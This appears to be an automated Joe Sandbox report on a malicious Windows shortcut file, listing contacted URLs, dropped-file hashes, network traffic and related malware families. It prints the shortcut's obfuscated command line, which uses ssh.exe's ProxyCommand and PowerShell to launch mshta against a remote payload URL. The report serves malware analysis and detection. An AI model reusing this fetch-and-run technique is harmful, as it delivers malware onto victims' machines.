https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css: | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4Pgs | mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4C: | mshta.exe, 00000005.00000002.3564144751.000001B5C0F00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2345137749.0000029200031000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637) | mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/ | mshta.exe, 00000005.00000002.3564144751.000001B5C0FB8000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/D | mshta.exe, 00000005.00000002.3568334539.000001BDC7F62000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://awakka-aws3.zoho-documents.com/hekko.mp4i | mshta.exe, 00000005.00000002.3564064373.000001B5C0EF0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4yles/cf.errors.css | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 00000006.00000002.3566515266.0000021AFF200000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://awakka-aws3.zoho-documents.com/hekko.mp4P | powershell.exe, 00000004.00000002.2345137749.000002920014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2345137749.00000292003A2000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4_ | powershell.exe, 00000004.00000002.2348868362.000002927E6D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...p | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/5xx-error-landing | mshta.exe, 00000005.00000002.3566486432.000001BDC3A6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...ust | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod/C: | edb.log.6.dr | false | - | high
https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypass | mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4m32 | powershell.exe, 00000004.00000002.2348447690.000002927C7B0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssnt | mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4L | powershell.exe, 00000004.00000002.2347693599.000002927C5E4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4https://awakka-aws3.zoho-documents.com/hekko.mp4p7 | mshta.exe, 00000005.00000002.3567740148.000001BDC3C15000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637... | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4H | mshta.exe, 00000005.00000002.3563920706.000001B5C0EC0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypassk | mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4Ygs | mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/MX | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://awakka-aws3.zoho-documents.com/hekko.mp4$global:? | powershell.exe | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637q | mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2345137749.0000029200049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2345137749.000002920005C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://awakka-aws3.zoho-documents.com/hekko.mp42 | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637m | mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637n | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm | ssh.exe, 00000000.00000002.3563617247.00000229B4079000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, IOnqEVA4Dz.lnk | true | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/ | mshta.exe, 00000005.00000002.3564144751.000001B5C0FB8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637i | mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?13767556376.1 | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.129.82 | awakka-aws3.zoho-documents.com | United States | 13335 | CLOUDFLARENETUS | false

Private IPs contacted:
  • 127.0.0.1
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1582822
                                Start date and time:2024-12-31 15:40:23 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 36s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:IOnqEVA4Dz.lnk
                                renamed because original name is a hash value
                                Original Sample Name:c5997a14e872d97d48e1d4ea8b66910f.lnk
                                Detection:MAL
                                Classification:mal76.winLNK@9/11@1/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 5
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .lnk
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 40.126.32.140, 20.109.210.53
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target mshta.exe, PID 6464 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 5520 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:41:46 | API Interceptor | 1x Sleep call for process: mshta.exe modified
09:41:47 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://br.custmercompa.de/ | malicious | Unknown | 172.67.139.222
 | tyPafmiT0t.exe | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | 188.114.96.3
 | vEtDFkAZjO.exe | malicious | RL STEALER, StormKitty | 104.21.85.189
 | Invoice-BL. Payment TT $ 28,945.99.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114
 | Statement of Account - USD 16,720.00.exe | malicious | AgentTesla | 104.26.12.205
 | MJhe4xWsnR.msi | malicious | Unknown | 162.159.61.3
 | MJhe4xWsnR.msi | malicious | Unknown | 172.64.41.3
 | 5EfYBe3nch.exe | malicious | LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc | 104.21.96.1
 | zhMQ0hNEmb.exe | malicious | LummaC | 104.21.112.1
 | 2RxMkSAgZ8.exe | malicious | LummaC | 104.21.64.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | setup.msi | malicious | Unknown | 172.67.129.82
 | GYede3Gwn0.lnk | malicious | Unknown | 172.67.129.82
 | 6684V5n83w.exe | malicious | Vidar | 172.67.129.82
 | heteronymous.vbs | malicious | Remcos, GuLoader | 172.67.129.82
 | zku4YyCG6L.exe | malicious | Unknown | 172.67.129.82
 | hca5qDUYZH.exe | malicious | Unknown | 172.67.129.82
 | Loader.exe | malicious | Meduza Stealer | 172.67.129.82
 | setup.msi | malicious | Unknown | 172.67.129.82
 | BHgwhz3lGN.exe | malicious | Vidar | 172.67.129.82
 | Open Purchase Order Summary Details-16-12-2024.vbs | malicious | LodaRAT, XRed | 172.67.129.82
                                No context
                                Process:C:\Windows\System32\svchost.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):0.8307334092697921
                                Encrypted:false
                                SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugV:gJjJGtpTq2yv1AuNZRY3diu8iBVqFz
                                MD5:5AFBA68B4CC1DC976F9166F76722D412
                                SHA1:C3C1AF0F9094B4408362AC9E61DD89417FAB3CD9
                                SHA-256:1484790DC972F11F9DC22B307649F478911C5B5A9EE01FE29F81ADE456AFFF05
                                SHA-512:A43C82E93E85D7E259B7C6453B1CF89FAF5D693AC21ABDD19A2C749A58621AE97D18FDF5036342300BA4A7CC8EC18254A42BEAD820C675BC6DC536536D0DE3C9
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\System32\svchost.exe
                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5d423fbe, page size 16384, DirtyShutdown, Windows version 10.0
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):0.6586196469763912
                                Encrypted:false
                                SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                MD5:D239925ABA956C9135D554707AA852B1
                                SHA1:AC8A297524C19558752816D82AE75A84410B9F77
                                SHA-256:DB9929B847582756E386BCFF83285E62A941BA65BC21BBD9BE5D2C637455EE1B
                                SHA-512:B72C24818ECD9633C2BB261107B90C58AF7A5E3CCB6BAF5ADBF78A274BA39DC1DFF5489AB579A7B71242F8A4924B72FA63CE83A49F4F79C3D07C1E0171A9E24E
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\System32\svchost.exe
                                File Type:SysEx File - Waldorf
                                Category:dropped
                                Size (bytes):16384
                                Entropy (8bit):0.08104037160020645
                                Encrypted:false
                                SSDEEP:3:zYe9q6pGGkGuAJkhvekl1iMkllrekGltll/SPj:zz9Berxl1sJe3l
                                MD5:3754B10FFAD812C23E92F65691D73D29
                                SHA1:A511CC8AA829EAE356BB065F4EFA7CA713444C94
                                SHA-256:F4AB531B0379DB9FC4ADE89D72EC173DD905F85905CFFD28FD3CA545B9536F5B
                                SHA-512:D56DCB666F4E5AF62206D4DB291A23969583E28073707570D9B0B41D43F8AE9CB857E0FB888C4CDB90201F5777E444D62B4A70F649742360C933D751F1160F52
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\System32\mshta.exe
                                File Type:ASCII text, with very long lines (24050)
                                Category:dropped
                                Size (bytes):24051
                                Entropy (8bit):4.941039417164537
                                Encrypted:false
                                SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                MD5:5E8C69A459A691B5D1B9BE442332C87D
                                SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                Malicious:false
                                Process:C:\Windows\System32\mshta.exe
                                File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):7.0936408308765495
                                Encrypted:false
                                SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                MD5:C33DE66281E933259772399D10A6AFE8
                                SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.773832331134527
                                Encrypted:false
                                SSDEEP:3:Nlllulo/:NllUo/
                                MD5:E54D0B143115DA49AA5126838E7B394E
                                SHA1:F5CB59DCFB794E2B68B61F55D98A2AD0B3035C3D
                                SHA-256:1A7168DD4E695D69BBC1A590D2EC6DDCD335C968A4000734C6D9155754EC09B9
                                SHA-512:284B3E5A76AF507F423DD23CBDAFBB5DD73CBEAA4BE983B0828D1E9BBE5CAEC0C98FF46D30289CD52D0CE6B8EB9E6AD57358906F16DB0722100A8B43935C1920
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\svchost.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):55
                                Entropy (8bit):4.306461250274409
                                Encrypted:false
                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                Malicious:false
                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                Entropy (8bit):2.7294806585734723
                                TrID:
                                • Windows Shortcut (20020/1) 100.00%
                                File name:IOnqEVA4Dz.lnk
                                File size:2'514 bytes
                                MD5:c5997a14e872d97d48e1d4ea8b66910f
                                SHA1:e5bc26705b9df5eadfc65ff0bb600743b4d2894d
                                SHA256:1e31450855498aa18f97e2bd1b77aa3cf652b88271502ca7ee926938c04b722f
                                SHA512:823516ffba77091d43af0a499904fc3e2fb8e62560cea050113fc7b91cebe9cceea10aeca3a8ec6459aee709b3b1282549a1401391d10fa93e49b033cf231846
                                SSDEEP:24:8lj/BF//Z/Udt1v+/+GF+WbUkT+1Z8lOxk86+vdd79dsHhWUIeFIU:81LZwGF+aUkIigdJ9Z5W
                                TLSH:295162042AFA0711F3B39E31C4BAA721843BBD06EEB19F1D004D41881727A19E976F6B
                                Icon Hash:72d282828e8d8dd5

                                General

                                Relative Path:..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
                                Command Line Argument: -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
                                Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 15:41:46.559809923 CET | 56040 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 15:41:46.573206902 CET | 53 | 56040 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 15:41:46.559809923 CET | 192.168.2.5 | 1.1.1.1 | 0xabe8 | Standard query (0) | awakka-aws3.zoho-documents.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 15:41:46.573206902 CET | 1.1.1.1 | 192.168.2.5 | 0xabe8 | No error (0) | awakka-aws3.zoho-documents.com | | 172.67.129.82 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:41:46.573206902 CET | 1.1.1.1 | 192.168.2.5 | 0xabe8 | No error (0) | awakka-aws3.zoho-documents.com | | 104.21.2.148 | A (IP address) | IN (0x0001) | false
                                • awakka-aws3.zoho-documents.com
                                • https:
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49723 | 172.67.129.82 | 443 | 6464 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 14:41:47 UTC | 343 | OUT | GET /hekko.mp4 HTTP/1.1
                                Accept: */*
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: awakka-aws3.zoho-documents.com
                                Connection: Keep-Alive
2024-12-31 14:41:47 UTC | 259 | IN | HTTP/1.1 403 Forbidden
                                Date: Tue, 31 Dec 2024 14:41:47 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Server: cloudflare
                                CF-RAY: 8fab084decec41f2-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-12-31 14:41:47 UTC1110INData Raw: 31 31 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                Data Ascii: 11ca<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                2024-12-31 14:41:47 UTC1369INData Raw: 6c 61 79 20 3d 20 27 62 6c 6f 63 6b 27 3b 0a 20 20 20 20 7d 29 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74
                                Data Ascii: lay = 'block'; }) }</script>...<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-det
                                2024-12-31 14:41:47 UTC1369INData Raw: 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 42 61 4f 65 41 73 4c 47 33 65 75 35 4b 41 6f 59 75 42 53 4c 58 6e 4c 30 74 47 58 61 61 51 67 76 55 73 6d 50 62 35 76 51 65 76 6b 2d 31 37 33 35 36 35 36 31 30 37 2d 30 2e 30 2e 31 2e 31 2d 2f 68 65 6b 6b 6f 2e 6d 70 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63
                                Data Ascii: ype="text/plain"> <input type="hidden" name="atok" value="BaOeAsLG3eu5KAoYuBSLXnL0tGXaaQgvUsmPb5vQevk-1735656107-0.0.1.1-/hekko.mp4"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; bac
                                2024-12-31 14:41:47 UTC714INData Raw: 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 0a 20 20 3c 2f 70 3e 0a 20 20 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65
                                Data Ascii: ="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-re
                                2024-12-31 14:41:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49726 | 172.67.129.82 | 443 | 6464 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 14:41:47 UTC | 421 | OUT | GET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                Accept: */*
                                Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: awakka-aws3.zoho-documents.com
                                Connection: Keep-Alive
2024-12-31 14:41:47 UTC | 411 | IN | HTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:41:47 GMT
                                Content-Type: text/css
                                Content-Length: 24051
                                Connection: close
                                Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                ETag: "675fc4ac-5df3"
                                Server: cloudflare
                                CF-RAY: 8fab0851fdf90dc7-EWR
                                X-Frame-Options: DENY
                                X-Content-Type-Options: nosniff
                                Expires: Tue, 31 Dec 2024 16:41:47 GMT
                                Cache-Control: max-age=7200
                                Cache-Control: public
                                Accept-Ranges: bytes
